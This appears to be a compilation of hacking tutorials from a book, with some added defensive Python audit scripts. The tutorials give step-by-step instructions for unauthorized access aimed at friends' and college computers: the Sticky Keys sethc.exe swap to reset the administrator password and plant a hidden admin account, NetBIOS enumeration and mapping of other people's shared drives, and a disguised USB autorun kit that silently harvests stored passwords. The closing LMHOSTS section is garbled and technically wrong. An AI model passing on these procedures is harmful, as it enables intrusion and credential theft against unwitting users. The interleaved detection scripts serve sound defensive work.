Ever wanted to hack your college PC with a guest/student account so that you can download at full speed there? Or just wanted to hack your friend's PC to make him gawk when you tell your success story of hacking? Well, there is a great way of hacking an administrator account from a guest account, by which you can reset the administrator password and get all the privileges an administrator enjoys on Windows. Interested? Read on...

Concept
Press the Shift key 5 times and the Sticky Keys dialog shows up. This works even at the logon screen. But if we replace sethc.exe, which is responsible for the Sticky Keys dialog, with cmd.exe, and then call sethc.exe by pressing Shift 5 times at the logon screen, we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password, even from a guest account.

Prerequisites
Guest account with write access to system32.

Here is how to do that:
* Go to C:/windows/system32
* Copy cmd.exe and paste it on the desktop.
* Rename cmd.exe to sethc.exe.
* Copy the new sethc.exe to system32; when Windows asks about overwriting the file, click Yes. When asked to overwrite, overwrite the sethc.exe.
* Now log out from your guest account and at the user select window press the Shift key 5 times.
* Instead of the Sticky Keys confirmation dialog, a command prompt with full administrator privileges will open. Press the Shift key 5 times and the command prompt will open.
* Now type "NET USER ADMINISTRATOR aaa" where "aaa" can be any password you like, and press Enter.
* You will see "The command completed successfully". Then exit the command prompt and log in to Administrator with your new password.
* Congrats, you have hacked admin from a guest account.

Further...
Also, you can create a new user at the command prompt by typing "NET USER Ephemeral /ADD" where "Ephemeral" is the username you would like to add with administrator privileges. Then hide your newly created admin account: go to the Registry Editor and navigate to this key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, give it the name of the user you created for your admin account, and live with your admin account forever :)
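A defender's check for the two changes this section makes, sethc.exe overwritten by a copy of cmd.exe and an account hidden through the UserList key, as an added example that is not part of the original book. The function names (sethc_swapped, hidden_accounts, audit) are this example's own; the System32 path and the UserList values are supplied by the caller, and make_demo_system32() builds a constructed stand-in directory so the check runs anywhere.

```python
"""Audit for the Sticky Keys swap and the hidden-account trick described above.

Added example, not from the original book.  The System32 path and the
UserList values are supplied by the caller; make_demo_system32() builds a
constructed stand-in directory so the check can be run anywhere.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path

USERLIST_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"


def sha256_file(path):
    """Hex SHA-256 of a file, read in 1 MiB chunks so large binaries are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sethc_swapped(system32):
    """True when sethc.exe is byte-for-byte identical to cmd.exe.

    That is exactly what the copy-rename-overwrite steps above produce; a
    genuine sethc.exe never hashes the same as cmd.exe.
    """
    system32 = Path(system32)
    cmd, sethc = system32 / "cmd.exe", system32 / "sethc.exe"
    if not (cmd.is_file() and sethc.is_file()):
        return False
    return sha256_file(cmd) == sha256_file(sethc)


def hidden_accounts(userlist_values):
    """Names under SpecialAccounts\\UserList whose DWORD is 0.

    A new DWORD defaults to 0, and 0 hides that account from the logon
    screen, so every 0 entry is a candidate hidden account.
    """
    return sorted(name for name, value in userlist_values.items() if value == 0)


def read_userlist_from_registry():
    """Read the UserList values on Windows; {} elsewhere or if the key is absent."""
    try:
        import winreg
    except ImportError:  # not Windows
        return {}
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USERLIST_KEY) as key:
            index = 0
            while True:
                try:
                    name, value, _kind = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    break
                values[name] = value
                index += 1
    except OSError:  # key does not exist on a clean machine
        pass
    return values


def audit(system32, userlist_values):
    """Return human-readable findings; an empty list means nothing was found."""
    findings = []
    if sethc_swapped(system32):
        findings.append("sethc.exe is identical to cmd.exe: Sticky Keys backdoor")
    for account in hidden_accounts(userlist_values):
        findings.append(f"account {account!r} hidden from logon screen via UserList")
    return findings


def make_demo_system32(swapped):
    """Constructed stand-in for C:\\Windows\\System32 (demo data, not real binaries)."""
    folder = Path(tempfile.mkdtemp(prefix="demo_system32_"))
    (folder / "cmd.exe").write_bytes(b"MZ constructed cmd.exe stand-in")
    if swapped:
        # the overwrite from the tutorial: sethc.exe becomes a copy of cmd.exe
        shutil.copyfile(folder / "cmd.exe", folder / "sethc.exe")
    else:
        (folder / "sethc.exe").write_bytes(b"MZ constructed sethc.exe stand-in")
    return folder


if __name__ == "__main__":
    demo = make_demo_system32(swapped=True)
    # constructed UserList: "Ephemeral" hidden (0), Administrator visible (1)
    for line in audit(demo, {"Ephemeral": 0, "Administrator": 1}):
        print("FINDING:", line)
    shutil.rmtree(demo)
```

On a real machine pass r"C:\Windows\System32" and read_userlist_from_registry() to audit(); the check needs only read access, so it can run from an unprivileged account.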

NetBIOS Hacking

-What is it?
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?
Windows OS
Cain and Abel (oxid.it - Home)

-[Step 1, Finding the target.]-
So first off we need to find a computer, or the computer, to hack into. If you're plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built-in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program, click on the Sniffer tab,

click Start/Stop Sniffer, and then click the blue cross.

Another window will pop up; make sure "All hosts in my subnet" is selected, and then click OK.

It should begin to scan.

Then IPs, computer names, and MAC addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can't tell whether the IP address is a computer, router, modem, etc., that's OK.

During the next step we will begin our trial and error.

-[Part 2, Trial and Error]-
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the Start menu and go to Run, type in cmd, and click OK. This should bring up the command prompt. From here we will do most of the hacking.

Now I will be referring to certain commands that need to be input into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let's get back to the hacking. Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103." This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):

If it didn't work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

-[Part 3, Gathering the Information.]-
Now, input this command: "nbtstat -a (IP address of target)." An example would be "nbtstat -a 192.168.1.103." This will show us if there is file sharing enabled, and if there is, it will give us the currently logged on user, workgroup, and computer name.

OK, you're probably wondering, "What does all this mean to me?" Well, this is actually very important; without this, the hack would not work. So, let me break it down from top to bottom. I will just give the first line of information, and then explain the paragraph that follows it. The information right below the original command says "Local Area Connection"; this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found and there is no IP. The information right below "Local Area Connection" is "Wireless Network Connection 2:". It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into. The NetBIOS Remote Machine Name Table gives us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>.

This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computer's workgroup, SUPERHEROES. If you are confused about which one is the workgroup and which is the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup.

-[Step 4, Breaking In]-
Finally it's time. By now we know: that our target is online, our target has file sharing, and our target's computer name. So it's time to break in. We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"

An example for this tutorial would be: "net view \\192.168.1.103"

We have just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." This means that it is the actual C disk of the computer. The C disk can sometimes be a person's entire hard drive. All that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the target's computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive)". For my example in this tutorial, "net use K: \\192.168.1.103\C." OK, let's say that you plan on doing this again to a different person; do you see the "K" after "net use"? This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.

As you can see, for my hack I have already used "K," so I used "G" instead. You may also do the same for multiple hacks. If it worked, it will say "The command completed successfully." If not, you will have to go retrace your steps. Now open up "My Computer" under the Start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. Congratulations! You're DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

-Program used in this tutorial:
Cain and Abel

How to hack passwords using USB Drive
Today I will show you how to hack passwords using a USB pen drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pen drive you can create your own rootkit to hack passwords from your friend's/college computer. We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 - v6.0.
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more.
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables (.exe files) onto your USB pen drive. I.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.
2. Create a new Notepad file and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen drive.
3. Create another Notepad file and write the following text into it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad file and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pen drive on your friend's PC or on your college computer. Just follow these steps:
1. Insert the pen drive and the autorun window will pop up. (This is because we have created an autorun pen drive.)
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (this process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pen drive and you'll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the computer.
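From the defender's side the staged files this section produces are easy to recognise: an autorun.inf whose open= line points at a batch file, and a batch file that starts the five recovery tools with /stext. The audit below is an added example, not part of the original book; its function names are its own, the tool names come from the text above, and make_demo_drive() writes the page's two files into a constructed temporary directory so it runs anywhere.

```python
"""Audit a removable drive for the autorun.inf + launch.bat staging shown above.

Added example, not from the original book.  make_demo_drive() creates a
constructed stand-in drive containing the two files from the tutorial.
"""
import configparser
import shlex
import tempfile
from pathlib import Path

# executables the tutorial copies to the drive (names taken from the text)
PASSWORD_RECOVERY_TOOLS = {"mspass.exe", "mailpv.exe", "iepv.exe", "pspv.exe", "passwordfox.exe"}
# autorun.inf keys that name something to run
LAUNCH_KEYS = ("open", "shellexecute")
BATCH_SUFFIXES = {".bat", ".cmd"}


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys ({} if absent)."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    if not parser.has_section("autorun"):
        return {}
    return dict(parser.items("autorun"))


def batch_launches(text):
    """Lower-cased program names launched by `start` lines in a batch file."""
    launched = []
    for raw in text.splitlines():
        try:
            tokens = shlex.split(raw, posix=False)  # keeps "quoted titles" as one token
        except ValueError:                          # unbalanced quote: fall back
            tokens = raw.split()
        if not tokens or tokens[0].lower() != "start":
            continue
        args = tokens[1:]
        if args and args[0].startswith('"'):        # start "window title" prog.exe
            args = args[1:]
        if args:
            launched.append(args[0].strip('"').lower())
    return launched


def audit_removable_drive(root):
    """Findings for a drive root; an empty list means no autorun staging was seen."""
    root = Path(root)
    findings = []
    inf = root / "autorun.inf"
    if not inf.is_file():
        return findings
    section = parse_autorun(inf.read_text(errors="replace"))
    for key in LAUNCH_KEYS:
        target = section.get(key)
        if not target:
            continue
        findings.append(f"autorun.inf {key}={target}")
        target_path = root / target.strip('"')
        if target_path.suffix.lower() in BATCH_SUFFIXES and target_path.is_file():
            for exe in batch_launches(target_path.read_text(errors="replace")):
                if exe in PASSWORD_RECOVERY_TOOLS:
                    findings.append(f"{target} starts credential-recovery tool {exe}")
    if section.get("action"):
        # the social-engineering label shown in the AutoPlay dialog
        findings.append(f"autorun.inf advertises action label {section['action']!r}")
    return findings


def make_demo_drive(with_autorun=True):
    """Constructed stand-in for the USB drive, holding the tutorial's two files."""
    root = Path(tempfile.mkdtemp(prefix="demo_usb_"))
    if with_autorun:
        (root / "autorun.inf").write_text("[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n")
        (root / "launch.bat").write_text(
            "start mspass.exe /stext mspass.txt\n"
            "start mailpv.exe /stext mailpv.txt\n"
            "start iepv.exe /stext iepv.txt\n"
            "start pspv.exe /stext pspv.txt\n"
            "start passwordfox.exe /stext passwordfox.txt\n"
        )
    return root


if __name__ == "__main__":
    for finding in audit_removable_drive(make_demo_drive()):
        print("FINDING:", finding)
```

Since Microsoft's February 2011 AutoRun update, Windows XP, Vista and 7 no longer honour autorun.inf on USB drives, so on a patched machine the pop-up in step 1 never appears; the staged files are still on the drive for this audit to find.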

How to hack someone with his IP address

Introduction
1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document will teach you some simple things about NETBIOS, what it does, how to use it, how to hack with it, and some other simple DOS commands that will be useful to you in the future.

1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC. It is responsible for starting up your computer, transferring control of the system to your operating system, and for handling other low-level functions, such as disk access. NOTE that the BIOS is not a software program, insofar as it is not purged from memory when you turn off the computer. It's firmware, which is basically software on a chip. A convenient little feature that most BIOS manufacturers include is a startup password. This prevents access to the system until you enter the correct password. If you can get access to the system after the password has been entered, then there are numerous software-based BIOS password extractors available from your local H/P/A/V site.

NETBIOS/NBTSTAT - What does it do?
2. NETBIOS, also known as NBTSTAT, is a program run on the Windows system and is used for identifying a remote network or computer with file sharing enabled. We can exploit systems using this method. It may be old but on home PCs sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember that you are reading this document because you want to learn. So I am going to teach you. OK. So, you ask, "How do I get to NBTSTAT?" Well, there are two ways, but one's faster.
Method 1: Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2: Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
OK! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. Your screen should look like the following:

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ]
  -a   (adapter status)  Lists the remote machine's name table given its name
  -A   (Adapter status)  Lists the remote machine's name table given its IP address.
  -c   (cache)           Lists NBT's cache of remote [machine] names and their IP addresses
  -n   (names)           Lists local NetBIOS names.
  -r   (resolved)        Lists names resolved by broadcast and via WINS
  -R   (Reload)          Purges and reloads the remote cache name table
  -S   (Sessions)        Lists sessions table with the destination IP addresses
  -s   (sessions)        Lists sessions table converting destination IP addresses to computer NETBIOS names.
  -RR  (ReleaseRefresh)  Sends Name Release packets to WINS and then, starts Refresh
  RemoteName   Remote host machine name.
  IP address   Dotted decimal representation of the IP address.
  interval     Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
C:\WINDOWS\DESKTOP>

The only two commands that are going to be used, and here they are:
  -a   (adapter status)  Lists the remote machine's name table given its name
  -A   (Adapter status)  Lists the remote machine's name table given its IP address.

Host Names
3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a host name looks like, here's an example:
123-fgh-ppp.internet.com
There are many variations of these addresses. For each different address you see there is a new ISP assigned to that computer. Look at the difference:
abc-123.internet.com
ghj-789.newnet.com
These are different host names as you can see, and by identifying the last couple of words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a differently located server:
123-fgh-ppp.internet.com
567-cde-ppp.internet.com

IP Addresses
4. You can resolve these host names, if you want, to the IP address (Internet Protocol). IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. Here's a cable connection IP:
24.18.18.10
On dialup connections IPs are higher, like this:
208.148.255.255

Notice the 208 is higher than the 24 which is the cable connection. REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS. Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway, this gives you an idea on IP addresses which you will be using on the nbtstat command.

Getting The IP Through DC (Direct Connection)
5. First, you're going to need to find his IP or host name. Either will work. If you are on mIRC you can get it by typing /whois (nick) ...where (nick) is the person's nickname without parentheses. You will either get a host name or an IP. Copy it down. If you do not get it, or you are not using mIRC, then you must direct connect to their computer, or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work nowadays. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are sending a file to their computer you are directly connected. AOL INSTANT MESSENGER allows a direct connection to the user if accepted. ICQ, when sending a file or when a chat request is accepted, allows a direct connection. Any time you are sending a file, you are directly connected (assuming you know the user is not using a proxy server). Voice chatting on Yahoo establishes a direct connection. If you have none of these programs, I suggest you either get one, get a sniffer, or read this next statement. If you have any way of sending them a link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method I use. It even fools some smarter hackers, because it catches them off guard. Anyway, once you are directly connected, use either of the two methods I showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program whose name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and it is on a port that you know, such as Sub Seven: 27374.) Your screen should look like this, showing the connections to your computer:

------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    172.255.255.82:1027    205.188.68.46:13784    ESTABLISHED
  TCP    172.255.255.82:1036    205.188.44.3:5190      ESTABLISHED
  TCP    172.255.255.82:1621    24.131.30.75:66        CLOSE_WAIT
  TCP    172.255.255.82:1413    205.188.8.7:26778      ESTABLISHED
  TCP    172.255.255.82:1483    64.4.13.209:1863       ESTABLISHED

C:\WINDOWS\DESKTOP>
------------------------------------------------------------

The first line indicates the Protocol (language) that is being used by the two computers. TCP (Transfer Control Protocol) is being used in this and is most widely used. Local Address shows your IP address, or the IP address of the system you are on. Foreign Address shows the address of the computer connected to yours. State tells you what kind of connection is being made. ESTABLISHED means it will stay connected to you as long as you are on the program, or as long as the computer is allowing or is needing the other computer's connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT, which means it is timed. Most ads that run on AOL are using TIME_WAIT states. The way you know the person is directly connected to your computer is because of this:

------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n

Active Connections

  Proto  Local Address          Foreign Address          State
  TCP    172.255.255.82:1027    205.188.68.46:13784      ESTABLISHED
  TCP    172.255.255.82:1036    205.188.44.3:5190        ESTABLISHED
  TCP    172.255.255.82:1621    24.131.30.75:66          CLOSE_WAIT
  TCP    172.255.255.82:1413    abc-123-ppp.webnet.com   ESTABLISHED
  TCP    172.255.255.82:1483    64.4.13.209:1863         ESTABLISHED

C:\WINDOWS\DESKTOP>
------------------------------------------------------------

Notice the host name is included in the fourth line instead of the IP address as on all the others. This is almost ALWAYS the other computer that is connected to you. So here, now, you have the host name: abc-123-ppp.webnet.com. If the host name is not listed and the IP is, then NO PROBLEM, because either one works exactly the same. I am using the abc-123-ppp.webnet.com host name as an example. OK, so now you have the IP and/or host name of the remote system you want to connect to. Time to hack! Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. OK, there's the crap again. Well, now it's time to try out what you have learned from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know. IMPORTANT, READ NOW!!!

  -a   (adapter status)  Lists the remote machine's name table given its name
  -A   (Adapter status)  Lists the remote machine's name table given its IP address.

Remember this? Time to use it.
-a will be the host name
-A will be the IP
How do I know this? Read the statements following the -a and -A commands. It tells you there what each command takes. So have you found which one you have to use? GOOD! Time to start.

Using it to your advantage
6. Type this if you have the host name only:
NBTSTAT -a (in here put in the hostname without parentheses)
Type this if you have the IP address only:
NBTSTAT -A (in here put in the IP address without parentheses)
Now, hit Enter and wait. Now either one of two things came up:
1. Host not found
2. Something that looks like this:

--------------------------------------------
NetBIOS Local Name Table

   Name               Type         Status
--------------------------------------------
GMVPS01        <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
GMVPS01        <03>  UNIQUE      Registered
GMVPS01        <20>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered
--------------------------------------------

If the computer responded "Host not found" then either one of two things is the case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, this system isn't hackable using the NBTSTAT command. So try another system. If you got the table as above to come up, look at it carefully as I describe to you each part and its purpose.
Name - states the share name of that certain part of the computer.
<00>, <03>, <20>, <1E> - are the hexadecimal codes giving you the services available on that share name.
Type - is self-explanatory. It's either turned on, or activated by you, or always on.
Status - simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it? GOOD! Now this is important so listen up. The hexadecimal code of <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's how to do it. (This is the hard part.)
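To turn the name table into something you can act on when auditing your own hosts (this serves section 6 here and Part 3 of the NetBIOS Hacking tutorial earlier), the following added parser summarises nbtstat -a/-A output using the standard NetBIOS suffix meanings; it is not part of the original document and its function names are its own. The GMVPS01 table is the one printed above; the BATGIRL table is constructed from the earlier section's names, with a made-up logged-on user and a placeholder MAC address.

```python
"""Summarise `nbtstat -a/-A` output: computer, workgroup, users, file sharing.

Added example, not from the original document.  Suffix meanings are the
standard NetBIOS name-type assignments; sample tables are embedded below.
"""
import re

NAME_ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.IGNORECASE)
MAC_LINE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")

# (suffix, type) -> registered service; the <20> entry is the one the text keys on
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer or logged-on user)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("20", "UNIQUE"): "File Server Service (file and printer sharing)",
}

# table as printed above in section 6
SAMPLE_GMVPS01 = """
       NetBIOS Local Name Table

   Name               Type         Status
---------------------------------------------
GMVPS01        <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
GMVPS01        <03>  UNIQUE      Registered
GMVPS01        <20>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered
"""

# constructed from the BATGIRL/SUPERHEROES example; ALFRED and the MAC are made up
SAMPLE_BATGIRL = """
Wireless Network Connection 2:
Node IpAddress: [192.168.1.103] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    BATGIRL        <00>  UNIQUE      Registered
    SUPERHEROES    <00>  GROUP       Registered
    BATGIRL        <20>  UNIQUE      Registered
    SUPERHEROES    <1E>  GROUP       Registered
    ALFRED         <03>  UNIQUE      Registered

    MAC Address = 00-00-00-00-00-00
"""


def parse_name_table(text):
    """List of (name, suffix, type, status) rows, or None for 'Host not found'."""
    if "Host not found" in text:
        return None
    rows = []
    for line in text.splitlines():
        match = NAME_ROW.match(line)
        if match:
            name, suffix, ntype, status = match.groups()
            rows.append((name, suffix.upper(), ntype.upper(), status))
    return rows


def summarize(text):
    """What the tutorial reads off the table, as a dict."""
    rows = parse_name_table(text)
    if rows is None:
        return {"reachable": False}
    computer = next((n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE")), None)
    workgroup = next((n for n, s, t, _ in rows if (s, t) == ("00", "GROUP")), None)
    # a <03> UNIQUE name that is not the computer itself is a logged-on user
    users = sorted({n for n, s, t, _ in rows if (s, t) == ("03", "UNIQUE") and n != computer})
    mac = MAC_LINE.search(text)
    return {
        "reachable": True,
        "computer": computer,
        "workgroup": workgroup,
        "logged_on_users": users,
        "file_sharing": any((s, t) == ("20", "UNI" "QUE") for _, s, t, _ in rows),
        "mac": mac.group(1) if mac else None,
        "services": [(n, s, SUFFIX_MEANING.get((s, t), "unknown")) for n, s, t, _ in rows],
    }


if __name__ == "__main__":
    for sample in (SAMPLE_GMVPS01, SAMPLE_BATGIRL, "Host not found."):
        print(summarize(sample))
```

A <20> entry only says the Server service is registered; whether anything is actually shared, and to whom, is decided by the share list and its permissions, so treat it as a lead to check on your own hosts rather than as a result.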

Page 58


LMHOST File

7. There is a file in all Windows systems called LMHOST.sam. We simply need to add the IP to the LMHOST file, because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, Files or Folders, type in LMHOST and hit Enter. When it comes up, open it with a text program such as WordPad, but make sure you do not leave the "always open files with this extension" box ticked. Go through the LMHOST file until you see this part:

# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with a #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addition the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.

Read this over and over until you understand how you want your connection to be set up. Here's an example of how I would add an IP:

#PRE #DOM:255.102.255.102 #INCLUDE

PRE will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automatically set you to that file path. In this case, as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive.

